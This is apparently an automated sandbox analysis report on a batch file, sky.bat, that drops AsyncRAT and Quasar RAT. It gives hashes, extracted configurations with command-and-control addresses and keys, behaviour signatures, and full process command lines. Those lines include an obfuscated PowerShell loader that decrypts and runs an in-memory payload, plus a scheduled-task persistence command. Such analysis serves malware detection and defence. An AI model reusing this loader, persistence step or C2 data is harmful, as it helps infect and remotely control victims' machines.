Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows10-1703_x64
- resource: win10-20220901-en
- resource tags: arch:x64, arch:x86, image:win10-20220901-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 12/01/2023, 16:32
Static task: static1
Behavioral task: behavioral1
- Sample: sky.bat
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: sky.bat
- Resource: win10-20220901-en
General
- Target: sky.bat
- Size: 49KB
- MD5: 4300caa42bd8fc0c7d9ce83b19c6f1f6
- SHA1: ed8eedc542e02a8ab749b02f161d39bb840a589c
- SHA256: d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e
- SHA512: 0ebcd250ff95b3bd8058e4bc69640afec65cf91a2745e71303edc48e6066ffa44a589bc2bd060eb54a0c9bc189169757f9a0ec292a6200090e1422db5f64ed30
- SSDEEP: 1536:WBqEwgF4HVzac6F8F2xqWa8VfXx0da57eezlV4R:1/gF41GLNxfa8VPuda57egQ
Malware Config
Extracted: asyncrat
- version: 0.5.7B
- botnet: Default
- c2: 154.12.250.38:6606, 154.12.250.38:7707, 154.12.250.38:8808
- mutex: AsyncMutex_6SI8OkPnk
- delay: 3
- install: false
- install_folder: %AppData%
Extracted: quasar
- version: 1.4.0
- botnet: Office04
- c2: 154.12.250.38:4782
- mutex: 41264372-ec70-4ccc-bf22-851572e94d2a
- encryption_key: 2D1A3994D3C8E5C6071E7048589030F3E389DDC7
- install_name: Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: Quasar Client Startup
- subdirectory: SubDir
Signatures
- Quasar payload (1 IoC)
  resource: behavioral2/memory/3964-220-0x000001A4726F0000-0x000001A472778000-memory.dmp, yara_rule: family_quasar
- Async RAT payload (2 IoCs)
  resource: behavioral2/memory/4604-141-0x00000112AD050000-0x00000112AD062000-memory.dmp, yara_rule: asyncrat
  resource: behavioral2/memory/4604-171-0x00000112AE440000-0x00000112AE462000-memory.dmp, yara_rule: asyncrat
- Executes dropped EXE (2 IoCs)
  pid 4604, process sky.bat.exe
  pid 3964, process mbwito.bat.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 12, ioc api.ipify.org
  flow 13, ioc api.ipify.org
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 4740, process schtasks.exe
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 4604, process sky.bat.exe
  pid 4604, process sky.bat.exe
  pid 4604, process sky.bat.exe
  pid 4904, process powershell.exe
  pid 4904, process powershell.exe
  pid 4904, process powershell.exe
  pid 3964, process mbwito.bat.exe
  pid 3964, process mbwito.bat.exe
  pid 3964, process mbwito.bat.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 4604, process sky.bat.exe
  Token: SeDebugPrivilege, pid 4904, process powershell.exe
  Token: SeDebugPrivilege, pid 3964, process mbwito.bat.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 3964, process mbwito.bat.exe
  pid 3964, process mbwito.bat.exe
- Suspicious use of SendNotifyMessage (2 IoCs)
  pid 3964, process mbwito.bat.exe
  pid 3964, process mbwito.bat.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3964, process mbwito.bat.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  PID 1928 wrote to memory of 4604 (pid 1928, process cmd.exe, procid_target 67)
  PID 1928 wrote to memory of 4604 (pid 1928, process cmd.exe, procid_target 67)
  PID 4604 wrote to memory of 800 (pid 4604, process sky.bat.exe, procid_target 69)
  PID 4604 wrote to memory of 800 (pid 4604, process sky.bat.exe, procid_target 69)
  PID 800 wrote to memory of 4904 (pid 800, process cmd.exe, procid_target 71)
  PID 800 wrote to memory of 4904 (pid 800, process cmd.exe, procid_target 71)
  PID 4904 wrote to memory of 3164 (pid 4904, process powershell.exe, procid_target 72)
  PID 4904 wrote to memory of 3164 (pid 4904, process powershell.exe, procid_target 72)
  PID 3164 wrote to memory of 3964 (pid 3164, process cmd.exe, procid_target 74)
  PID 3164 wrote to memory of 3964 (pid 3164, process cmd.exe, procid_target 74)
  PID 3964 wrote to memory of 4740 (pid 3964, process mbwito.bat.exe, procid_target 75)
  PID 3964 wrote to memory of 4740 (pid 3964, process mbwito.bat.exe, procid_target 75)
Processes
Level 1: C:\Windows\system32\cmd.exe (PID 1928)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"
  - Suspicious use of WriteProcessMemory
Level 2: C:\Users\Admin\AppData\Local\Temp\sky.bat.exe (PID 4604)
  Command line: "sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
Level 3: C:\Windows\System32\cmd.exe (PID 800)
  Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"' & exit
  - Suspicious use of WriteProcessMemory
Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4904)
  Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"'
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
Level 5: C:\Windows\system32\cmd.exe (PID 3164)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mbwito.bat" "
  - Suspicious use of WriteProcessMemory
Level 6: C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe (PID 3964)
  Command line: "mbwito.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mbwito.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
Level 7: C:\Windows\SYSTEM32\schtasks.exe (PID 4740)
  Command line: "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe" /rl HIGHEST /f
  - Creates scheduled task(s)
Downloads
- Filesize: 1KB
  MD5: 6128469adf6a46e1fde5c24182bcbece
  SHA1: b1056fc0c08aa1c70dd2c4b4aaeb6ddd7661d981
  SHA256: d8f5a2e911a00db37c73ad0251651a5a72cdc5455f5ae8ca2ea275d3351fc61c
  SHA512: efec3e82e4c59657c2540c6c77ca5e4170fbea30d239df7d15b8f0459aba0b3ce5df3cc25ae321585f5f32e4ecc0a2f2fccbc831521598e892c5bb37ae0e8500
- Filesize: 325KB
  MD5: 2f84982ec56d82645ac61de4fb3e6e50
  SHA1: 92817fc3db66755ad189049f8e4ad3dbbaaa6db1
  SHA256: 56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
  SHA512: 2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd
- Filesize: 435KB
  MD5: f7722b62b4014e0c50adfa9d60cafa1c
  SHA1: f31c17e0453f27be85730e316840f11522ddec3e
  SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
  SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4